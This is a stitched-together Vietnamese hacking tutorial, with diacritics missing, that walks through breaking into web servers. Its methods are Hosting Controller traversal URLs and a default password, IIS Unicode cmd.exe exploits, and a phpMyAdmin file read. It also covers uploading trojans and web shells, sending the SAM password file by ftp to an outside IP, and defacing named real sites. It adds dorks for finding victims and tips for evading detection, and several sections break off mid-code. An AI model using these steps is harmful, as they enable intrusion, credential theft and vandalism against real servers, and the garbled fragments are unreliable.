Professional Documents
Culture Documents
http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3
Trong Victim l Server b li HC m bn mun Hack
Ti s v d cc Hack server qua 1 site nm trong server (hay cn gi l Hack
local exploit)
VD : site ny b Hacker Forum hack : http://123hollywood.com/hf.htm
thanh Address bn nh 1 trong cc dng lnh sau :
http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3
Lc ny bn s vo c phn "Browser Directories". y l ton b cu trc ca
Website . Khi cc bn vo c bn trong ca C:\ bn thy c th mc websites
(i vi server ang th nghim ny, cn i vi cc server khc th n thng nm
D:/) .
Nu bn thy th OK . Bn hy vo trong v thy 1 lot cc website. Vi server chng
ta ang Hack trn bn s thy cc website c a vo cc th mc ring l theo vn.
Chng ta hy tm ti website m nh n chng ta vo dc server ny .
Bn hy vo 123web/123kinh/123hollywood.com/www/. Bn thy cc k n gin
ng khng .
Sau khi bit c ng dn ca site cn Hack th bn dng Script sau :
http://www.example.com/advwebadmin/folders...om&OpenPath=C:/
Thay example bng tn ca Server v testing bng tn trang Web mun Hack
V d : Bn ng k Website tn cuonglong ca FPT th ti FPT s cho bn mt ni
trang Web : c:\webspace\resadmin\cuonglong\cuonglong.com\www
Mun Hack trang ny th bn nh Script nh trn :
http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/
Vy l bn vo c cu trc th mc ca Web nhng lc ny bn ch quyn
upload 1 file no t cng ca bn ln site thi
Sau bn upload file ntdaddy.asp Website . V chy file ny trn Website ly
nhng file *.mdb v *.SAM v, y l file cha password, bn ch vic gii m ra
Vy l bn Hack c Website ri
By gi ti s hng dn cc bn cch upload v xo file trn cc site ny :
Ci ny th cng cc k n gin, bn hy xem mu sau :
http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/
trong testing l cc ng dn vo website m bn mun upload ; OK !
By gi th bn c th nghch thoi mi; Bn c th cho ton b site die trong
1 gi cng c hi hi ..
Cn 1 vi li na ca HC, trong c li cho php bn c kh nng khi to cho mnh 1
hosting trong server nh dng lnh sau :
http://victim.com/admin/autosignup/dsp_newwebadmin.asp
Cng nh trn, Victim l Server b li HC m bn mun Hack. V d l Website
http://bigguy.ourweb.net/
http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp
Mnh khi to ci ny, cc bc v xem : http://www.hackerforum.com/
Li ny cho php cho ng k free Domain. Bn hy ng ngay 1 Domain cho mnh ri
vo http://www.victim.com/AdvAmin/ Login vi vi Account va ng k. Sau khi
Login, bn click vo mc Directories trn menu ri vo Domain ca bn. Sau , bn hy
upload trang web ca mnh ln (ni upload di cng) v nh l tn trang web ng
di, ri click vo logout ( bn phi trn cng). Vy l ta i c na chng ng
Tip theo bn hy vo : http://www.victim.com/AdvAdmin/import/imp_...in.com\www
Bn hy thay ch "username" bng username lc u bn ng k Domain v thay ch
www.yourdomain.com bng a ch Domain m bn ng k v enter. V d ti ng k
1 Domain tn http://www.cuonglong.com/ vi username l ncviet Website
http://bigguy.ourweb.net/ th ti s g :
http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www
y l phn Import ca Website. N s hin ra 4 khung ng dn. By gi bn hy tm
trang web ca mnh khung th nht bn di v click vo n ri nhn nt "import".
By gi n copy trang Web ca bn vo khung th hai bn di. Ok, vy l bn
Hack xong ri . v d bn upload file cl.htm th ng dn Web ca bn s l :
http://bigguy.ourweb.net/AdvAdmin/cl.htm
Ch : http://www.victim.com/ s c thay bng Website b li hc. V c th trong qu
trnh hack, server s bt gi IP ca bn v vy bn nn ngy trang cho tht kho .
Bn c th tm rt nhiu server hin vn cn ang b li ny bng cch v
http://www.google.com/ ri nhp t kho "Hosting Controller" cho n Search.
Tip theo l mt li slash dot dot ca HC cho php ta thy c ng dn cc a v
cc th mc ca server v ta c th li dng n add (thm vo) mt ng dn DSN
ch ti mt a ch mi. khai thc li ny bn dng on code sau :
http://www.target.com/admin/dsn/dsnmanager....\..\
Ci th hai l chng ta c th thay i hon ton hay add vo th mc admin v thi hnh
nhng g chng ta mun. khai thc li ny ch cn a vo on code sau :
http://www.target.com/admin/import/imp_roo...tpPath=C:\
Bn c th nm quyn iu khin ton b cc file trong th mc (v c th l c C:\) v
thay i ty thch..
V li cui cng l default password, nu admin khng xo hay thay i user c tn l
AdvWebadmin (user default) th iu ny rt nguy him, bi v ta c th nm quyn iu
khin hon ton server (hay 1 phn) thng qua password default cho user ny l
"advcomm500349", sau th hack ch l vic d dng.
Tin th mnh cng ch thm cho cc bn cch ci trojan hoc 1 chng trnh DoS
(Denial of Service) vo server m ban vo c phc v cho cng vic Hack cho
mnh sau ny. Thng th khi Hack qua li HC bn rt kh c th ci thng chng trnh
vo C:/ nh li IIS c. Nhng chng ta vn c th ci 1 chng trnh nh chng ta
setup qua site nm trong server. Bn hy Upload 1 con trojan vo 1 site m chng ta
mun (Cch Upload nh trn ni). Sau y ti s ci 1 con reaccserver c chc nng
khi ci vo 1 server chng ta c th iu khin server bng my tnh nh mnh. Ti
upload file reaccserver.exe ln site http://123hollywood.com/ .
By gi mun ci t trojan ny vo trong server bn hy nh dng sau :
http://123hollywood.com/reaccserver.exe
Bn t hi lm sao m n c th ci vo c server m khng qua thng bo my ch.
ng, thng th cc phn mm qun l Hosting s thng bo my ch nhng thng
th ngi qun l server s b qua ch ny khi ci t HC Khi bn nh dng trn nu
thnh cng th IE s thng bo "server setup file full". Nu khng thnh cng n s bo
"Can't not Found". Lc ny bn hy nh li :
http://123hollywood.com/../../../reaccserver.exe
m bo s OK
Ch : khi setup file th PC ca bn cng s b ci t chng trnh . Bn
hy g n ra . Va ri mnh ci t trojan reaccserver ri. By gi bn hy dng phn
cn li ca chng trnh l file cp.exe. Chng ta c th Shutdown hoc Restart server kia.
Thng th server s mt t nht 3 pht khi ng li .
By gi mnh cng ni thm v li 1 s Website cc server ci t HC l thng cc
file upload.asp nm trong cc th mc ca Website. V vy mc d li HC c b fix th
chng ta cng Hack nh thng .
y l v d : http://www.aten2000.com/aspupload_samples_...rmAndScript.asp Bn
thy cha ! Mnh c th upload bt c file no m mnh mun . By gi mnh th tm cu
trc thng c1o ca 1 website ci HC nha. Bn hy vo y :
http://www.aten2000.com/cmd.asp xem ton b server vi cc lnh dir C:\ ; dir D:\ ;
dir E:\ v c file bng lnh type C:\..[ngdn].. ----> Ch : lnh ny c th c c
bt c file no .
Bn th tm trong m xem cng c nhiu lm .
khi cc bn vo c server, bn nn ci 1 file ASP c cng cho . y
l cu trc ca file cmd.asp :
----------------------------------------------------------------------<%@ Language=VBScript %>
<%
' --------------------o0o-------------------' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
browser, nh www.democoun.com/sam._ .
Cch khc l dng ftp send file mnh mun n 1 a ch ftp m mnh bit, bng g
lnh trong cmdasp.asp hay nddaddy.asp (Cch ny ti c Kha cung cp thng tin). Tuy
nhin, ta ko th nhp v chy tng lnh tng tc ftp dng cc trnh ny c, bn phi
to 1 file text c cha danh sch cc lnh v yu cu ftp chy cc lnh . Cch to 1 filte
text, ta s dng lnh echo, xem vd sau:
echo OPEN 111.214.156.105 > c:\dl.txt & vol
sau khi nhp vo textbox lnh ca cmdasp v run, lnh ny s to mt file c:\dl.txt c
cha lnh "open 111.214.156.105". Gn tng t vi cc lnh khc, vd lnh sau s thm
1 dng vo sau lnh open trong file dl.txt:
echo USER anonymous anyname@anon.com >> c:\dl.txt & vol
Lu t cu lnh th 2 tr i, ta phi dng ">>" thay v ">". Cc bn lm tng t vi
cc lnh cn li, sao cho cc lnh trong dl.txt dng send ftp 1 file t nht phi c cc
lnh sau:
OPEN 111.214.156.105
USER USER anonymous anyname@anon.com
binary
send
C:\sam._
sam._
BYE
Cc lnh trn s send file c:\sam._ server bn ang hack n a ch anon
111.214.156.105.
Nh vy, bn to xong 1 script ftp file cn. By gi dng lnh sau thc thi cc
lnh trong dl.txt. Trc tin, bn chuyn v th mc cha dl.txt, dng lnh cd c:\, v
nhp lnh sau vo lnh cmdasp: "ftp -n -s:c:\dl.txt" v Run!
Nu thnh cng, tc l browser ko bo li v ch hin cc thng tin kt ni ftp...th file
sam._ c gi n a ch anon trn. Bn ch vic ftp vo download v. Sau
bn dng chng trnh L0phtCrack gii m file SAM
Lu l cc file bn copy v download xong, hy xa trnh b pht hin.
Mun tm cc Website b li Hosting Controller th bn vo http://www.google.com/ ri
g : "allinurl:/advadmin" (khng c du ngoc kp) nhn nt Google Search
Tha cc bn, nhng g mnh pht hin cng chng phi mi m g, chng qua l tn
dng cc li bit ca HC thi. Cng ging nh p dng l thuyt vo bi tp thi!
:smg]
Sau khi ng k 1 account vi ng dn:
http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp
Th cc bn c quyn UPLOAD ln server cc trojan v backdoor. Nhng lm sao
active n c? Bn hy lm theo cc bc sau y:
1.Tm a ch IP ca my Server host trang web .
function CheckEntries(frm)
{
var flag;
Empty = false;
if (frm.PassCheck.checked )
{
if (frm.Pass1.value == "" )
{
alert("The password or confirm password are empty");
frm.Pass1.focus();
return false;
}
}
frm.action="http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionTyp
e=UpdateUser&User
Name="+frm.UserName;
frm.submit();
}
function GoBack(frm)
{
frm.action="AccountManager.asp";
frm.submit();
}
</script>
</head>
<body>
<form name="newUserForm"
action="http://www.yourvictim.com/admin/acounts/AccountActions.asp?ActionType=U
pdateUser"
method="post" onSubmit="return CheckEntries(newUserForm)">
<center><h2>Update User Account</h3><p></center>
<center>
<table BORDER="0" align="center" CELLSPACING="1" CELLPADDING="1"
width="60%" class="trhead">
<tr>
<td>Alter</td>
<td>User Information</td>
</tr>
</table>
<table align="center" class="trbody" width="60%">
<tr>
<td>
User Name:
</td>
<td>
killuser
</td>
<input type="hidden" name="UserName" value="killuser">
</tr>
<tr>
<td>
Full Name:
</td>
<td>
<input name="FullName" align="LEFT" tabindex="2" title="New Full Name"
value="killuser">
</td>
</tr>
<tr>
<td>
Description
:
</td>
<td>
<input name="Description" align="LEFT" tabindex="3" title="Description" value="">
</td>
</tr>
<tr>
<td>
Change Password Also:
</td>
<td>
<input type="checkbox" name="PassCheck"
value="TRUE">
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/chang
e_password.h
tm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>
New Password
:
</td>
<td>
<input type="password" name="Pass1" align="LEFT" tabindex="4" title="Password">
</td>
</tr>
<tr>
<td>
Account Disabled:
</td>
<td>
<input type="checkbox" name="AccountDisabled" align="LEFT" tabindex="6"
title="Account
Disabled" >
<a
href="javascript:callHelp('http://www.yourvictim.com/admin/acounts/help/reseller/disabl
e_account.h
tm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>
User Cannot Change password:
</td>
<td>
<input type="checkbox" name="UserChangePassword" align="LEFT" tabindex="7"
title="Change
Password" >
</td>
</tr>
</table>
<input type="hidden" name="ActionType" value="AddUser" title="AddUser">
<table WIDTH="60%" ALIGN="center" CELLSPACING="1" CELLPADDING="1"
class="trhead">
<tr>
<td><input type="button" class=butn name="Update" value="Update User"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
CheckEntries(this.form)"></td>
<td><input type="button" class=butn name="Cancel" value="Back"
align="MIDDLE" tabindex="7" title="Submit" onclick="return
GoBack(this.form)"></td>
</tr>
</table>
</form>
</body>
</html>
[17]
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+
[18]
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19]
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20]
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/
c+
Buoc 3:
Anh em mo Browser go dia chi trang Web va copy phan bug ma Unicode phat hien vao.
VD: Toi go
perl unicode.pl
Host: http://www.tnh.com.vn
Port: 80
Sau khi no Scan thi thay cai Host nay co 2 Bug 14 va 18. Toi co the su dung mot trong 2
bug nay. Chang han toi su dung Bug 18.
Toi mo Browser, trong thanh Add toi go:
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+
Vay la ban da dot nhap duoc vao IIS roi day. Cac ban co the truy cap vao o cung cua IIS
nhu la o cung cua minh vay. Cac ban co the tao, xoa, di chuyen, thu muc, file, up, down
va run cac file tren Server do...Muon vay cac ban chi can dung cac lenh cua DOS thoi.
Dung noi voi toi la cac ban khong biet lenh Dos nha.
VD: De doc o C----Cac ban go dir+c:\----Tuong ung voi dong lenh o Browser.
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
Tuong tu co cac lenh nhu: md, rd, ren...Cu ngam lai sach DOS la OK het a.
P/S: Thong thuong trang Web thuong o inetpub\wwwroot
Anh em chi can dzo day thay File index.html cua no bang index.html cua minh. Vay la
OK! Website do bi hack roi day. Nho dung cac chuong trinh de che dau IP cho an toan
nha. Khong la boc lich nhu choi day. Duoi day la mot so Website dung IIS
http://www.psv.com.vn/
http://www.tnh.com.vn/
http://www.mekonggreen.com.vn
http://www.thaiweb.co.th/
http://www.khaitri.com.vn/
Cach xac dinh Bug va cach dot nhap vao o cung cua Server do em da de cap voi anh em o
bai viet truoc roi nha. Cu cho la anh em da dot nhap duoc vao o cung cua Site do roi di.
De Down file anh em dung lenh type (xem noi dung file cua DOS). Voi cac file *.html,
*.txt thi no se View noi dung cho anh em xem, con voi cac file khong View duoc thi no
se hien len cua so yeu cau Save to disk (khong phai Server nao cung lam duoc nhu vay
dau, con tuy).
VD: em muon down mot file o www.tnh.com.vn (em thi chi quen thuc tap bang cai nay
thoi a). Em go
http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\ten file muon Down.
Anh em dung len qua lam dung cung nhu tan pha qua dang cac site.
P/S: Hack IIS thi duoc roi, nhung di dao tren Iiternet em thay da so cac site thuong dung
Apache Server. Em dang tap Hack Apache Server. Em hien dang co mot tai lieu day hack
Apache Server, em doc thay kha de hieu....Nhung khi thuc hanh thi mai khong duoc,
khong biet la tai Server do Patch roi hay la tai em ngu. Anh nao biet cach hack Apache
lam on huong dan anh em voi....Website cua bon FPT cung dung IIS, nhung rat tiec la no
da Patch roi.
UP FILES TRONG IIS SERVER
Em se gioi thieu tiep voi anh em cach Up file len IIS da bi bug. Bai nay khong phai do
em viet, em chi di hoc lom thoi, thay hay thi post cho anh em thoi a. Dau tien anh em can
tai doan Code (lai ten la Unicode) tu dia chi: http://www.cners.com/tools/unicode.zip
Chay file tftpd32.exe ( hoac tftpd.exe toi quen roi ) truong hop ko ro rang anh em cu
rename sao cho co du 2 file tftpd.exe va tftpd32.exe vay .
Chay file nay ,sau do xem so IP va ghi lai .
Dung notepad mo file uniexe.pl ra, sua cho xxx.xxx.xxx.xxx thanh so IP vua co tu tftpd .
Sua cac thong so tren cung hang voi cho xxx.xxx.xxx.xxx vua dien :
+thay "GET ncx99.exe" thanh "GET yyy.zzz" voi yyy.zzz la mot file nam tren o cung
cua anh em
+thay phan C:\inetpub\scripts bang duong dan den thu muc anh em muon upload file xem
vd sau de ro hon :
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm";
---> trong VD tren toi da copy 1 file trong thu muc C:\ cua toi ( co IP la 202.162.63.126 )
toi C:\inetpub\wwwroot\ cua may chu bi dinh unicode bug.
Sau do anh em ra ngoai DOS, go
Perl Ip cua may chu:port
VD: perl uniexe.pl 202.162.45.78:80
Neu khong co van de gi thi file do da duoc Up len server roi do.
Luu y: Ngoai up cac file *.html, anh em co the update cac trojan remote access hay la cac
chuong trinh getadmin cho Winnt de doat quyen admin roi tung hoanh trong may chu
nay.
De chay file tren Server, ra Dos go:
Perl uniexe.pl ip cua trang web:port ten file can run (co ca duong dan).
P/S: Khong phai bat cu may chu nao cung cho phep anh em tao, di chuyen, hay run tren
no dau. Tuy thuoc vao Admin thoi. Mot so anh em co noi rang khi Scan khong thay phat
hien Bug nao, chac la no Patch het tron roi. Anh em can phai di kiem Website khac
thoi....Theo em biet thi cac Website cua Thailand hay xai IIS lam. Em dang thuc hanh len
cung chang can nhieu Server lam, hien dang thuc hanh tren http://www.tnh.com.vn/
Anh em nao can thi co the dzo luon o cung cua no thuc hanh bang cach copy doan Code
sau vao Add trong Browser cua anh em.
http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\
Hay vao va tao mot thu muc HKC-LPTV. A quen, de an toan anh em len dung cac Proxy
de truy zdo may nay.
Sao mt thi gian bn rn...m tin v *chi dzi* (anyway, for those who really want
to know what I have done in the last three months, pay a visit to http://www.phpmvc.net ,
a PHP port of Jakarta Struts), nay mrro mi rnh ri c i cht, m tht ra l do hm
nay ngi lt lt li my ci folder c ghi du *mt thi tung honh* hi trc, bt cht
gp li mt ci file cng vui vui nn em y k cho mi ngi cng nghe. Hihi vui l
chnh thi nhen.
khng c thi quen hack bng cc li software h thng, n thch hack bng li ca my
thng admin v programmer *chuyn nghip* hn.
Thao tc vi ba ci URL, n nhanh chng nhn ra website ny dng Oracle lm backend
database. PHP v Oracle, mt s kt hp th v nh. Cha c nhiu kinh nghim hack cc
Oracle database server nhng thng mrro ghi vo file sggp.org.vn.txt thng tin ny khi
cn thit th dng n(hihi, mi mt ln lm chuyn g thng mrro iu ghi li vo mt
file, v ci file m n gp li hm nay chnh l file sggp.org.vn.txt ny).
nmap ch? Khoan vi . Gh thm bn Google t . Thng mrro g vo keyword
VDC Hosting, website ny thu host VDC m, th vn may xem. h, hin ra ngay v
tr th nht: TeleHosting <http://hosting.vnn.vn>. Th gh v chi xem c g th v
khng.
h, mt website trng cng c, trnh by gn gng. Lm mt s thao tc, thng mrro
i tn file sggp.org.vn.txt li thnh hosting.vnn.vn.txt v ghi thm vo mt s thng
tin(tt c thng tin ny iu c th c tm thy ngay Index v trn Netcraft):
-Telehosting: <http://hosting.vnn.vn>
- IP address: 203.162.96.70 (cng IP vi sggp.org.vn => shared hosting)
-Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux
-Control Panel: <http://hosting.vnn.vn/customers/>
-Demo account: cpvdc2/demo
Hihi, chuyn nghip nh, cho c demo account th h. Thng mrro th truy cp vo
Control Panel bng ci account . Thng Control Panel cung cp mt s cng c qun l
nh Cp nht thng tin, Gi th yu cu, FTP, FileManager, MySQL,WebmailHi b
nhiu nh. Hh, coi b ngon n h. Thng mrro h hng nhy vo th ci FTP,
*Permission denied*. Ti lt thng FileManager cng vy. Nhng ri v cu tinh cng
n, thng MySQL cho php truy cp, hihi, n dn thng mrro n phpMyAdmin b
cng c qun l MySQL. Coi nh xong na chng ng ri, thng mrro ci ha h .
Thng mrro t tin nh vy l cng c l do, vi MySQL v phpMyAdmin, n c th lm
c khi chuyn vi ci server ny. Bi n gin n c th chy c cc cu lnh
query trn my ch ny ri. V li, phpMyAdmin version c nh th ny (2.3.2) th chc
chn s c li, ai bit c nhiu khi may mn s c c li cho php n chy lnh trn
server ny. Gi search li phpMyAdmin trc hay hack thng MySQL trc y? Sao
khng lm song song nh, hihi, chc s c li hn. Ngh l lm, thng mrro m hai ca s
browser ln (FYI, its Firefox), mt ci n nhy vo Bugtraq search vi t kha
phpMyAdmin, mt ci n login vo phpMyAdmin vi account demo.
Vo trong phpMyAdmin ri, nhanh nh c lp trnh sn, thng mrro g cu lnh
query:
CREATE TABLE test(id INT,text LONGTEXT);
LOAD DATA LOCAL INFILE /etc/passwd INTO TABLE test FIELDS ESCAPE BY
;
SELECT * FROM test;
Huyremy c ln vit li qu trnh hack HVA nhng khng vui cho lm, v li Huy cng
vit c mi 1 ci thi ....Khi no tm c bi vit no vui th ny ti s li gii thiu
vi cc bn ! Chc vui v !
The End